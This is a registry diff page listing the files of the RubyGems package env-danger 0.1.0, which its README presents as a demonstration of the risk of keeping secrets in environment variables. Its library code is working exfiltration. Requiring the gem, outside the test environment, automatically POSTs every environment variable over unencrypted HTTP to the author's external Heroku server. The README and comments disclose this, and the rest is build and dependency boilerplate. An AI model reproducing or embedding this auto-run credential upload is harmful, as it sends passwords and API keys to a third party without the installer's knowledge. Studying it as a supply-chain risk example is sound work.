RubyGems - env-danger - Versions diffs - 0.1.0 - Mend

env-danger 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (17) hide show

checksums.yaml +7 -0
data/.document +5 -0
data/.rspec +2 -0
data/Gemfile +21 -0
data/Gemfile.lock +154 -0
data/LICENSE.txt +20 -0
data/README.md +29 -0
data/Rakefile +53 -0
data/VERSION +1 -0
data/env-danger.gemspec +91 -0
data/lib/env-danger.rb +8 -0
data/lib/env-danger/danger.rb +23 -0
data/lib/env-danger/version.rb +4 -0
data/spec/danger_spec.rb +21 -0
data/spec/fixtures/env_example.json +0 -0
data/spec/spec_helper.rb +104 -0
metadata +244 -0

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA1:
+  metadata.gz: f459f79828c0916a13ced463dd0b9f45f5986b52
+  data.tar.gz: 4939a095c90dfe48dca09ed376ef20dcff8e0350
+SHA512:
+  metadata.gz: e6047eebc78999ceef30fd8a29e5c768268b4ba8731e1eb4fa2fb4e8ca06c2524a1d8cf239cad946408f5d35bc05fda48ccc25669d1f9a44356ec8de96e6b4bf
+  data.tar.gz: bbb1ae0adb36362087f2e9cfd3a08b54bf37764cfb742507d6fa05888cd6590694bf643eecc864a807e8208a3dc2d2e8b9cbf43f2c8fc7f25fc48d8b6079a003

data/.document ADDED Viewed

@@ -0,0 +1,5 @@
+lib/**/*.rb
+bin/*
+-
+features/**/*.feature
+LICENSE.txt

data/.rspec ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ --color
2	+ --require spec_helper

data/Gemfile ADDED Viewed

@@ -0,0 +1,21 @@
+source 'http://rubygems.org'
+gem 'httparty', github: 'jnunemaker/httparty'
+group :development do
+  gem 'rdoc', '~> 3.12'
+  gem 'bundler', '~> 1.0'
+  gem 'jeweler', '~> 2.0.1'
+end
+group :development, :test do
+  gem 'rubocop'
+  gem 'rspec-core', '~> 3.2.0.pre', github: 'rspec/rspec-core'
+  gem 'rspec-expectations', '~> 3.2.0.pre', github: 'rspec/rspec-expectations'
+  gem 'rspec-support', '~> 3.2.0.pre', github: 'rspec/rspec-support'
+  gem 'rspec-mocks', '~> 3.2.0.pre', github: 'rspec/rspec-mocks'
+  gem 'rspec', '~> 3.2.0.pre', github: 'rspec/rspec'
+  gem 'simplecov', '>= 0'
+  gem 'coveralls'
+  gem 'webmock'
+end

data/Gemfile.lock ADDED Viewed

@@ -0,0 +1,154 @@
+GIT
+  remote: git://github.com/jnunemaker/httparty.git
+  revision: ed9b00b785c52dbea220b620faa6c8e6fbc29abe
+  specs:
+    httparty (0.13.3)
+      json (~> 1.8)
+      multi_xml (>= 0.5.2)
+GIT
+  remote: git://github.com/rspec/rspec-core.git
+  revision: 037291ea80486790da3916608ef4b101c1f71323
+  specs:
+    rspec-core (3.2.0.pre)
+      rspec-support (= 3.2.0.pre)
+GIT
+  remote: git://github.com/rspec/rspec-expectations.git
+  revision: 76962c4899b0413ce806a79e05a53e4b5d9da2c0
+  specs:
+    rspec-expectations (3.2.0.pre)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (= 3.2.0.pre)
+GIT
+  remote: git://github.com/rspec/rspec-mocks.git
+  revision: e9b6bf3532a4d5e01b492a5cad53fe56b751db3e
+  specs:
+    rspec-mocks (3.2.0.pre)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (= 3.2.0.pre)
+GIT
+  remote: git://github.com/rspec/rspec-support.git
+  revision: 187845b1d46269b17edcf24a67744f98a8d1e994
+  specs:
+    rspec-support (3.2.0.pre)
+GIT
+  remote: git://github.com/rspec/rspec.git
+  revision: 6af4995482ade2d49ad361ee003dee29f713ab17
+  specs:
+    rspec (3.2.0.pre)
+      rspec-core (= 3.2.0.pre)
+      rspec-expectations (= 3.2.0.pre)
+      rspec-mocks (= 3.2.0.pre)
+GEM
+  remote: http://rubygems.org/
+  specs:
+    addressable (2.3.6)
+    ast (2.0.0)
+    astrolabe (1.3.0)
+      parser (>= 2.2.0.pre.3, < 3.0)
+    builder (3.2.2)
+    coveralls (0.7.2)
+      multi_json (~> 1.3)
+      rest-client (= 1.6.7)
+      simplecov (>= 0.7)
+      term-ansicolor (= 1.2.2)
+      thor (= 0.18.1)
+    crack (0.4.2)
+      safe_yaml (~> 1.0.0)
+    descendants_tracker (0.0.4)
+      thread_safe (~> 0.3, >= 0.3.1)
+    diff-lcs (1.2.5)
+    docile (1.1.5)
+    faraday (0.9.0)
+      multipart-post (>= 1.2, < 3)
+    git (1.2.8)
+    github_api (0.12.2)
+      addressable (~> 2.3)
+      descendants_tracker (~> 0.0.4)
+      faraday (~> 0.8, < 0.10)
+      hashie (>= 3.3)
+      multi_json (>= 1.7.5, < 2.0)
+      nokogiri (~> 1.6.3)
+      oauth2
+    hashie (3.3.2)
+    highline (1.6.21)
+    jeweler (2.0.1)
+      builder
+      bundler (>= 1.0)
+      git (>= 1.2.5)
+      github_api
+      highline (>= 1.6.15)
+      nokogiri (>= 1.5.10)
+      rake
+      rdoc
+    json (1.8.1)
+    jwt (1.2.0)
+    mime-types (2.4.3)
+    mini_portile (0.6.2)
+    multi_json (1.10.1)
+    multi_xml (0.5.5)
+    multipart-post (2.0.0)
+    nokogiri (1.6.5)
+      mini_portile (~> 0.6.0)
+    oauth2 (1.0.0)
+      faraday (>= 0.8, < 0.10)
+      jwt (~> 1.0)
+      multi_json (~> 1.3)
+      multi_xml (~> 0.5)
+      rack (~> 1.2)
+    parser (2.2.0.pre.8)
+      ast (>= 1.1, < 3.0)
+      slop (~> 3.4, >= 3.4.5)
+    powerpack (0.0.9)
+    rack (1.6.0)
+    rainbow (2.0.0)
+    rake (10.4.2)
+    rdoc (3.12.2)
+      json (~> 1.4)
+    rest-client (1.6.7)
+      mime-types (>= 1.16)
+    rubocop (0.27.1)
+      astrolabe (~> 1.3)
+      parser (>= 2.2.0.pre.7, < 3.0)
+      powerpack (~> 0.0.6)
+      rainbow (>= 1.99.1, < 3.0)
+      ruby-progressbar (~> 1.4)
+    ruby-progressbar (1.7.0)
+    safe_yaml (1.0.4)
+    simplecov (0.9.1)
+      docile (~> 1.1.0)
+      multi_json (~> 1.0)
+      simplecov-html (~> 0.8.0)
+    simplecov-html (0.8.0)
+    slop (3.6.0)
+    term-ansicolor (1.2.2)
+      tins (~> 0.8)
+    thor (0.18.1)
+    thread_safe (0.3.4)
+    tins (0.13.2)
+    webmock (1.20.4)
+      addressable (>= 2.3.6)
+      crack (>= 0.3.2)
+PLATFORMS
+  ruby
+DEPENDENCIES
+  bundler (~> 1.0)
+  coveralls
+  httparty!
+  jeweler (~> 2.0.1)
+  rdoc (~> 3.12)
+  rspec (~> 3.2.0.pre)!
+  rspec-core (~> 3.2.0.pre)!
+  rspec-expectations (~> 3.2.0.pre)!
+  rspec-mocks (~> 3.2.0.pre)!
+  rspec-support (~> 3.2.0.pre)!
+  rubocop
+  simplecov
+  webmock

data/LICENSE.txt ADDED Viewed

@@ -0,0 +1,20 @@
+Copyright (c) 2015 David Fisher
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

data/README.md ADDED Viewed

@@ -0,0 +1,29 @@
+# ENV Danger
+As per this [blog post](http://movingfast.io/articles/environment-variables-considered-harmful/), and [discussion on Hacker News](https://news.ycombinator.com/item?id=8826024), keeping secret keys in your environment variables *may* be a poor idea. [The Twelve Factor App](http://12factor.net/) however specifically [recommends doing this](http://12factor.net/config).
+## What's this doing?
+This will take all your enviromental variables (passwords, secret keys, etc) and post them (insecurely over HTTP) to my server on Heroku.
+Server code can be found at: [https://github.com/tibbon/env_danger_server](https://github.com/tibbon/env_danger_server)
+## Usage
+**Do not install this gem and use it in production, or really... even in testing**
+But if you choose to ignore me:
+In your Gemfile
+```ruby
+  gem 'env-danger'
+```
+Or via Bundle:  `bundle install env-danger`
+You can run tests via `RAILS_ENV=test bundle exec rspec spec`. Yes, this is a little weird, but intentionally so.
+**Including this in your app will post your ENV variables to my (likely not very secure) server on Heroku. This is a terrible idea**

data/Rakefile ADDED Viewed

@@ -0,0 +1,53 @@
+# encoding: utf-8
+require 'rubygems'
+require 'bundler'
+begin
+  Bundler.setup(:default, :development)
+rescue Bundler::BundlerError => e
+  $stderr.puts e.message
+  $stderr.puts 'Run `bundle install` to install missing gems'
+  exit e.status_code
+end
+require 'rake'
+require 'jeweler'
+Jeweler::Tasks.new do |gem|
+  # gem is a Gem::Specification...
+  # see http://guides.rubygems.org/specification-reference/ for more options
+  gem.name = 'env-danger'
+  gem.homepage = 'http://github.com/tibbon/env-danger'
+  gem.license = 'MIT'
+  gem.summary = %(Do not install, a security-hole demo only)
+  gem.description = %(Demonstrates the dangers of using
+                        ENV to store credentials)
+  gem.email = 'tibbon@gmail.com'
+  gem.authors = ['David Fisher']
+  # dependencies defined in Gemfile
+end
+Jeweler::RubygemsDotOrgTasks.new
+require 'rake/testtask'
+Rake::TestTask.new(:test) do |test|
+  test.libs << 'lib' << 'test'
+  test.pattern = 'test/**/test_*.rb'
+  test.verbose = true
+end
+desc 'Code coverage detail'
+task :simplecov do
+  ENV['COVERAGE'] = 'true'
+  Rake::Task['test'].execute
+end
+task default: :test
+require 'rdoc/task'
+Rake::RDocTask.new do |rdoc|
+  version = File.exist?('VERSION') ? File.read('VERSION') : ''
+  rdoc.rdoc_dir = 'rdoc'
+  rdoc.title = "env-danger #{version}"
+  rdoc.rdoc_files.include('README*')
+  rdoc.rdoc_files.include('lib/**/*.rb')
+end

data/VERSION ADDED Viewed

	@@ -0,0 +1 @@
1	+ 0.1.0

data/env-danger.gemspec ADDED Viewed

@@ -0,0 +1,91 @@
+# Generated by jeweler
+# DO NOT EDIT THIS FILE DIRECTLY
+# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
+# -*- encoding: utf-8 -*-
+# stub: env-danger 0.1.0 ruby lib
+Gem::Specification.new do |s|
+  s.name = "env-danger"
+  s.version = "0.1.0"
+  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
+  s.require_paths = ["lib"]
+  s.authors = ["David Fisher"]
+  s.date = "2015-01-02"
+  s.description = "Demonstrates the dangers of using\n                        ENV to store credentials"
+  s.email = "tibbon@gmail.com"
+  s.extra_rdoc_files = [
+    "LICENSE.txt",
+    "README.md"
+  ]
+  s.files = [
+    ".document",
+    ".rspec",
+    "Gemfile",
+    "Gemfile.lock",
+    "LICENSE.txt",
+    "README.md",
+    "Rakefile",
+    "VERSION",
+    "env-danger.gemspec",
+    "lib/env-danger.rb",
+    "lib/env-danger/danger.rb",
+    "lib/env-danger/version.rb",
+    "spec/danger_spec.rb",
+    "spec/fixtures/env_example.json",
+    "spec/spec_helper.rb"
+  ]
+  s.homepage = "http://github.com/tibbon/env-danger"
+  s.licenses = ["MIT"]
+  s.rubygems_version = "2.2.2"
+  s.summary = "Do not install, a security-hole demo only"
+  if s.respond_to? :specification_version then
+    s.specification_version = 4
+    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
+      s.add_runtime_dependency(%q<httparty>, [">= 0"])
+      s.add_development_dependency(%q<rdoc>, ["~> 3.12"])
+      s.add_development_dependency(%q<bundler>, ["~> 1.0"])
+      s.add_development_dependency(%q<jeweler>, ["~> 2.0.1"])
+      s.add_development_dependency(%q<rubocop>, [">= 0"])
+      s.add_development_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<rspec>, ["~> 3.2.0.pre"])
+      s.add_development_dependency(%q<simplecov>, [">= 0"])
+      s.add_development_dependency(%q<coveralls>, [">= 0"])
+      s.add_development_dependency(%q<webmock>, [">= 0"])
+    else
+      s.add_dependency(%q<httparty>, [">= 0"])
+      s.add_dependency(%q<rdoc>, ["~> 3.12"])
+      s.add_dependency(%q<bundler>, ["~> 1.0"])
+      s.add_dependency(%q<jeweler>, ["~> 2.0.1"])
+      s.add_dependency(%q<rubocop>, [">= 0"])
+      s.add_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<rspec>, ["~> 3.2.0.pre"])
+      s.add_dependency(%q<simplecov>, [">= 0"])
+      s.add_dependency(%q<coveralls>, [">= 0"])
+      s.add_dependency(%q<webmock>, [">= 0"])
+    end
+  else
+    s.add_dependency(%q<httparty>, [">= 0"])
+    s.add_dependency(%q<rdoc>, ["~> 3.12"])
+    s.add_dependency(%q<bundler>, ["~> 1.0"])
+    s.add_dependency(%q<jeweler>, ["~> 2.0.1"])
+    s.add_dependency(%q<rubocop>, [">= 0"])
+    s.add_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<rspec>, ["~> 3.2.0.pre"])
+    s.add_dependency(%q<simplecov>, [">= 0"])
+    s.add_dependency(%q<coveralls>, [">= 0"])
+    s.add_dependency(%q<webmock>, [">= 0"])
+  end
+end

data/lib/env-danger.rb ADDED Viewed

@@ -0,0 +1,8 @@
+require 'httparty'
+require_relative './env-danger/version'
+require_relative './env-danger/danger'
+# Doesn't run in this line in test environment
+# stops test from picking it up and triggering it
+# Also makes my testing easier, so the real request isn't made
+EnvDanger.upload unless ENV['RAILS_ENV'] == 'test'

data/lib/env-danger/danger.rb ADDED Viewed

@@ -0,0 +1,23 @@
+# EnvDanger
+# This module takes your system's ENV variables and posts them to my server
+# Do NOT use in production
+# This is an example of what could happen if you allow untrusted code
+# to execute on your system.
+# Surely, no reasonable individual would allow such,
+# but how often do you audit your gems?
+module EnvDanger
+  include HTTParty
+  POST_ADDRESS = 'http://env-danger.herokuapp.com/envs'
+  class << self
+    def upload
+      post(
+        POST_ADDRESS,
+        body: {
+          all_envs: {
+            variables: ENV
+          }
+        }
+      )
+    end
+  end
+end

data/lib/env-danger/version.rb ADDED Viewed

@@ -0,0 +1,4 @@
+# Sets the version of EnvDanger gem
+module EnvDanger
+  VERSION = '0.0.1'
+end

data/spec/danger_spec.rb ADDED Viewed

@@ -0,0 +1,21 @@
+require 'spec_helper'
+require 'env-danger'
+RSpec.describe EnvDanger do
+  describe '.upload' do
+    before :each do
+      # Temporarily clear ENV hash,
+      # so that not much is posting to the server
+      ENV.clear
+      ENV.update({'foo' => 'bar'})
+      stub_request(:post, EnvDanger::POST_ADDRESS).
+        to_return(body: fixture('env_example.json'))
+    end
+    it 'posts ENV data via HTTParty' do
+      env_result = EnvDanger.upload
+      expect(a_request(:post, EnvDanger::POST_ADDRESS)).to have_been_made
+      expect(env_result.code).to eq 200
+    end
+  end
+end

data/spec/fixtures/env_example.json ADDED Viewed

File without changes

data/spec/spec_helper.rb ADDED Viewed

@@ -0,0 +1,104 @@
+require 'simplecov'
+require 'coveralls'
+require 'webmock/rspec'
+# This file was generated by the `rspec --init` command. Conventionally, all
+# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
+# The generated `.rspec` file contains `--require spec_helper` which will cause
+# this file to always be loaded, without a need to explicitly require it in any
+# files.
+#
+# Given that it is always loaded, you are encouraged to keep this file as
+# light-weight as possible. Requiring heavyweight dependencies from this file
+# will add to the boot time of your test suite on EVERY test run, even for an
+# individual file that may not need all of that loaded. Instead, consider making
+# a separate helper file that requires the additional dependencies and performs
+# the additional setup, and require it from the spec files that actually need
+# it.
+#
+# The `.rspec` file also contains a few flags that are not defaults but that
+# users commonly want.
+#
+# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
+RSpec.configure do |config|
+  # rspec-expectations config goes here. You can use an alternate
+  # assertion/expectation library such as wrong or the stdlib/minitest
+  # assertions if you prefer.
+  config.expect_with :rspec do |expectations|
+    # This option will default to `true` in RSpec 4. It makes the `description`
+    # and `failure_message` of custom matchers include text for helper methods
+    # defined using `chain`, e.g.:
+    #     be_bigger_than(2).and_smaller_than(4).description
+    #     # => "be bigger than 2 and smaller than 4"
+    # ...rather than:
+    #     # => "be bigger than 2"
+    expectations.include_chain_clauses_in_custom_matcher_descriptions = true
+  end
+  # rspec-mocks config goes here. You can use an alternate test double
+  # library (such as bogus or mocha) by changing the `mock_with` option here.
+  config.mock_with :rspec do |mocks|
+    # Prevents you from mocking or stubbing a method that does not exist on
+    # a real object. This is generally recommended, and will default to
+    # `true` in RSpec 4.
+    mocks.verify_partial_doubles = true
+  end
+  # The settings below are suggested to provide a good initial experience
+  # with RSpec, but feel free to customize to your heart's content.
+  # These two settings work together to allow you to limit a spec run
+  # to individual examples or groups you care about by tagging them with
+  # `:focus` metadata. When nothing is tagged with `:focus`, all examples
+  # get run.
+  config.filter_run :focus
+  config.run_all_when_everything_filtered = true
+  # Limits the available syntax to the non-monkey patched syntax that is
+  # recommended. For more details, see:
+  #   - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
+  #   - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
+  #   - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
+  config.disable_monkey_patching!
+  # This setting enables warnings. It's recommended, but in some cases may
+  # be too noisy due to issues in dependencies.
+  config.warnings = true
+  # Many RSpec users commonly either run the entire suite or an individual
+  # file, and it's useful to allow more verbose output when running an
+  # individual spec file.
+  if config.files_to_run.one?
+    # Use the documentation formatter for detailed output,
+    # unless a formatter has already been configured
+    # (e.g. via a command-line flag).
+    config.default_formatter = 'doc'
+  end
+  # Print the 10 slowest examples and example groups at the
+  # end of the spec run, to help surface which specs are running
+  # particularly slow.
+  config.profile_examples = 10
+  # Run specs in random order to surface order dependencies. If you find an
+  # order dependency and want to debug it, you can fix the order by providing
+  # the seed, which is printed after each run.
+  #     --seed 1234
+  config.order = :random
+  # Seed global randomization in this process using the `--seed` CLI option.
+  # Setting this allows you to use `--seed` to deterministically reproduce
+  # test failures related to randomization by passing the same `--seed` value
+  # as the one that triggered the failure.
+  Kernel.srand config.seed
+end
+# Helper methods for accessing fixture path
+def fixture_path
+  File.expand_path('../fixtures', __FILE__)
+end
+# Helper method for accessing a real file in the fixture path
+def fixture(file)
+  File.new(fixture_path + '/' + file)
+end

metadata ADDED Viewed

@@ -0,0 +1,244 @@
+--- !ruby/object:Gem::Specification
+name: env-danger
+version: !ruby/object:Gem::Version
+  version: 0.1.0
+platform: ruby
+authors:
+- David Fisher
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2015-01-02 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: httparty
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: rdoc
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.12'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.12'
+- !ruby/object:Gem::Dependency
+  name: bundler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.0'
+- !ruby/object:Gem::Dependency
+  name: jeweler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 2.0.1
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 2.0.1
+- !ruby/object:Gem::Dependency
+  name: rubocop
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: rspec-core
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: rspec-expectations
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: rspec-support
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: rspec-mocks
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: rspec
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: 3.2.0.pre
+- !ruby/object:Gem::Dependency
+  name: simplecov
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: coveralls
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: webmock
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+description: |-
+  Demonstrates the dangers of using
+                          ENV to store credentials
+email: tibbon@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files:
+- LICENSE.txt
+- README.md
+files:
+- ".document"
+- ".rspec"
+- Gemfile
+- Gemfile.lock
+- LICENSE.txt
+- README.md
+- Rakefile
+- VERSION
+- env-danger.gemspec
+- lib/env-danger.rb
+- lib/env-danger/danger.rb
+- lib/env-danger/version.rb
+- spec/danger_spec.rb
+- spec/fixtures/env_example.json
+- spec/spec_helper.rb
+homepage: http://github.com/tibbon/env-danger
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project:
+rubygems_version: 2.2.2
+signing_key:
+specification_version: 4
+summary: Do not install, a security-hole demo only
+test_files: []